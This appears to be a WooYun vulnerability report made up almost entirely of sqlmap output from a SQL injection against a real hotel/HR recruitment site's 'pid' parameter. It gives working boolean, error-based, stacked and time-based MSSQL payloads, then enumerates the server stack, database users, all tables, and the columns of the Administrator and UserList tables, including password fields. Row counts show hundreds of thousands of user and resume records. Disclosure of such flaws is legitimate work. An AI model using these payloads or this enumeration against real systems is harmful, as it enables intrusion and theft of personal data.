WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: pid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pid=1' AND 9739=9739 AND 'eMNZ'='eMNZ
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING 
clause
    Payload: pid=1' AND 7902=CONVERT(INT,(CHAR(58) CHAR(100) CHAR(113) 
CHAR(119)
 CHAR(58) (SELECT (CASE WHEN (7902=7902) THEN CHAR(49) ELSE CHAR(48) END)) 
CHAR(
58) CHAR(102) CHAR(106) CHAR(122) CHAR(58))) AND 'siIg'='siIg
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: pid=1'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: pid=1' WAITFOR DELAY '0:0:5'--
---
[10:32:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[10:32:12] [INFO] fetching database names
[10:32:12] [INFO] the SQL query used returns 6 entries
[10:32:13] [INFO] retrieved: hotel_160uu
[10:32:13] [INFO] retrieved: master
[10:32:13] [INFO] retrieved: model
[10:32:13] [INFO] retrieved: msdb
[10:32:13] [INFO] retrieved: tempdb
[10:32:14] [INFO] retrieved: triphrdb
available databases [6]:
[*] hotel_160uu
[*] master
[*] model
[*] msdb
[*] tempdb
[*] triphrdb
current user:    'hotelhr'
current database:    'triphrdb'
database management system users [2]:
[*] hotelhr
[*] SQL-s-a- OLD HENRY
Database: triphrdb
[59 tables]
+-----------------+
| Administrator   |
| Area            |
| Area1           |
| B_hangye        |
| B_hangyefenlei  |
| BizArea         |
| BizArea1        |
| CollectTalent   |
| College_person  |
| Company         |
| FriendLink      |
| H_Brand         |
| InterView       |
| Job             |
| Link            |
| Note            |
| Resume          |
| ScJObs          |
| Site            |
| Template        |
| UserGroup       |
| UserList        |
| condition       |
| advertise       |
| business        |
| city            |
| class_b         |
| cmailSee        |
| cmailauto       |
| cmailbox        |
| college         |
| dtproperties    |
| email_module    |
| fax_module      |
| fuwu            |
| gongqiu         |
| h_list          |
| hangye          |
| hetong          |
| hy_fenlei       |
| hy_gangwei      |
| jianlirule      |
| jiaozhu         |
| linkman         |
| newsrule        |
| province        |
| qiyetitle       |
| qy_Article      |
| qy_ArticleClass |
| qy_waifaMail    |
| tempurl         |
| tj              |
| user_moban      |
| yd_Lietou       |
| yd_SendMail     |
| yd_ads          |
| yd_moban        |
| zhuanye         |
| zy_category     |
+-----------------+
Database: triphrdb
Table: Administrator
[19 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| addtime  | datetime |
| admin    | int      |
| cid      | int      |
| E_mail   | nvarchar |
| fax      | nvarchar |
| id       | int      |
| mobile   | nvarchar |
| mrname   | nvarchar |
| MSN      | nvarchar |
| nicheng  | nvarchar |
| password | varchar  |
| pid      | int      |
| QQ       | nvarchar |
| quanxian | ntext    |
| state    | int      |
| tel      | nvarchar |
| username | varchar  |
| usertype | int      |
| zhiwu    | nvarchar |
+----------+----------+
Database: triphrdb
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.yd_SendMail     | 2209232 |
| dbo.cmailauto       | 2043840 |
| dbo.cmailbox        | 1540092 |
| dbo.qy_waifaMail    | 574259  |
| dbo.UserList        | 476006  |
| dbo.Resume          | 398884  |
| dbo.cmailSee        | 195607  |
| dbo.gongqiu         | 171026  |
| dbo.qy_Article      | 93057   |
| dbo.fuwu            | 91644   |
| dbo.InterView       | 79805   |
| dbo.Job             | 67595   |
| dbo.linkman         | 53941   |
| dbo.Company         | 41776   |
| dbo.business        | 34562   |
| dbo.CollectTalent   | 20676   |
| dbo.h_list          | 10119   |
| dbo.ScJObs          | 9907    |
| dbo.hetong          | 4614    |
| dbo.Note            | 2765    |
| dbo.BizArea         | 1276    |
| dbo.BizArea1        | 1276    |
| dbo.Area            | 1007    |
| dbo.Area1           | 1007    |
| dbo.college         | 719     |
| dbo.city            | 541     |
| dbo.hy_gangwei      | 408     |
| dbo.zhuanye         | 182     |
| dbo.yd_ads          | 140     |
| dbo.B_hangyefenlei  | 128     |
| dbo.H_Brand         | 122     |
| dbo.qy_ArticleClass | 97      |
| dbo.qiyetitle       | 68      |
| dbo.newsrule        | 48      |
| dbo.hy_fenlei       | 36      |
| dbo.province        | 35      |
| dbo.advertise       | 30      |
| dbo.zy_category     | 24      |
| dbo.Template        | 23      |
| dbo.email_module    | 21      |
| dbo.class_b         | 11      |
| dbo.Administrator   | 8       |
| dbo.B_hangye        | 7       |
| dbo.jianlirule      | 7       |
| dbo.hangye          | 5       |
| dbo.UserGroup       | 4       |
| dbo.Site            | 3       |
| dbo.College_person  | 2       |
| dbo.yd_moban        | 2       |
| dbo.fax_module      | 1       |
| dbo.FriendLink      | 1       |
| dbo.tj              | 1       |
+---------------------+---------+
Database: triphrdb
Table: UserList
[18 columns]
+------------+----------+
| Column     | Type     |
+------------+----------+
| Addtime    | datetime |
| addtime1   | datetime |
| Checked    | int      |
| Email      | varchar  |
| GroupId    | int      |
| GroupName  | varchar  |
| id         | int      |
| ip         | varchar  |
| isdfw      | tinyint  |
| ismail     | int      |
| LastLogin  | datetime |
| Locked     | int      |
| Logins     | int      |
| MailActive | int      |
| Mailcode   | varchar  |
| oldid      | int      |
| UserName   | varchar  |
| UserPwd    | varchar  |
+------------+----------+